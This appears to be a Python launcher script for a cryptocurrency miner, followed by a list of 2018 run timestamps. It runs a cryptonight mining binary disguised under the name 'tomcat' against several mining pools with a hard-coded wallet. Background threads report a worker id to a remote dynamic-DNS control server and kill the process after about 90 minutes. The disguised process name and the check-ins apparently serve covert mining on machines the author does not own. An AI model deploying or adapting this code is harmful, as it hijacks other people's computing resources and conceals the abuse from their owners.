import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:37:02.164692
#2018-02-17 17:25:01.420589
#2018-02-17 19:14:02.049712
#2018-02-17 21:02:06.176046
#2018-02-17 22:46:06.462535
#2018-02-18 00:32:07.204317
#2018-02-18 02:22:04.176559
#2018-02-18 04:09:05.922394
#2018-02-18 05:58:06.491323
#2018-02-18 07:50:08.819598
#2018-02-18 09:39:06.192680
#2018-02-18 11:25:08.580384
#2018-02-18 13:11:07.874616
#2018-02-18 14:59:05.111125
#2018-02-18 16:48:07.394329
#2018-02-18 18:36:06.229748
#2018-02-18 20:24:06.064987
#2018-02-18 22:10:08.165116
#2018-02-18 23:59:05.171273
#2018-02-19 01:45:01.524467
#2018-02-19 03:32:06.297102
#2018-02-19 05:17:05.765363
#2018-02-19 07:05:07.149891
#2018-02-19 08:54:05.442920
#2018-02-19 10:44:04.340394
#2018-02-19 12:32:07.046340
#2018-02-19 14:21:07.053720
#2018-02-19 16:09:05.997932
#2018-02-19 17:57:04.972356
#2018-02-19 19:44:01.845214
#2018-02-19 21:31:06.415398
#2018-02-19 23:17:08.445153
#2018-02-20 01:03:06.673928
#2018-02-20 02:52:01.889564
#2018-02-20 04:40:05.804123
#2018-02-20 06:24:03.651512
#2018-02-20 08:09:05.102843
#2018-02-20 09:54:05.749917
#2018-02-20 11:38:01.410277
#2018-02-20 13:25:04.433580
#2018-02-20 15:09:08.075134
#2018-02-20 16:55:09.156652
#2018-02-20 18:45:02.942495
#2018-02-20 20:39:07.409727
#2018-02-20 22:24:01.965199
#2018-02-21 00:04:07.979529
#2018-02-21 01:50:10.139935
#2018-02-21 03:38:05.770935
#2018-02-21 05:26:07.323620
#2018-02-21 07:14:03.680448
#2018-02-21 09:00:10.382107
#2018-02-21 10:48:09.309713
#2018-02-21 12:34:02.000860
#2018-02-21 14:22:10.932045
#2018-02-21 16:10:13.023067
#2018-02-21 18:00:03.372000
#2018-02-21 19:47:06.010330
#2018-02-21 21:35:10.606577
#2018-02-21 23:22:05.458514
#2018-02-22 01:12:02.136014
#2018-02-22 02:59:07.543480
#2018-02-22 04:46:01.980133
#2018-02-22 06:30:01.624662
#2018-02-22 08:17:06.206956
#2018-02-22 10:06:01.978865
#2018-02-22 11:51:09.409813
#2018-02-22 13:36:08.166198
#2018-02-22 15:26:10.148473
#2018-02-22 17:13:05.142394
#2018-02-22 18:59:07.983602
#2018-02-22 20:50:04.405040
#2018-02-22 22:35:07.115166
#2018-02-23 00:22:05.757768
#2018-02-23 02:11:08.257697
#2018-02-23 03:54:04.370249
#2018-02-23 05:40:03.192634
#2018-02-23 07:25:08.810403
#2018-02-23 09:30:07.894528
#2018-02-23 11:36:06.372782
#2018-02-23 13:26:06.213087
#2018-02-23 15:11:05.119172
#2018-02-23 16:59:03.791502
#2018-02-23 19:02:08.646120
#2018-02-23 20:47:04.219947
#2018-02-23 22:31:07.207492
#2018-02-24 00:17:04.491347
#2018-02-24 02:07:05.761035
#2018-02-24 03:57:01.769969
#2018-02-24 05:42:06.338173
#2018-02-24 07:33:01.952952
#2018-02-24 09:19:01.659959
#2018-02-24 11:06:06.645073
#2018-02-24 12:54:06.867107
#2018-02-24 14:42:09.002410
#2018-02-24 16:33:01.397637
#2018-02-24 18:22:02.121972
#2018-02-24 20:08:01.789122
#2018-02-24 21:52:04.025831
#2018-02-25 00:52:04.014876
#2018-02-25 04:42:05.288472
#2018-02-25 08:40:01.964990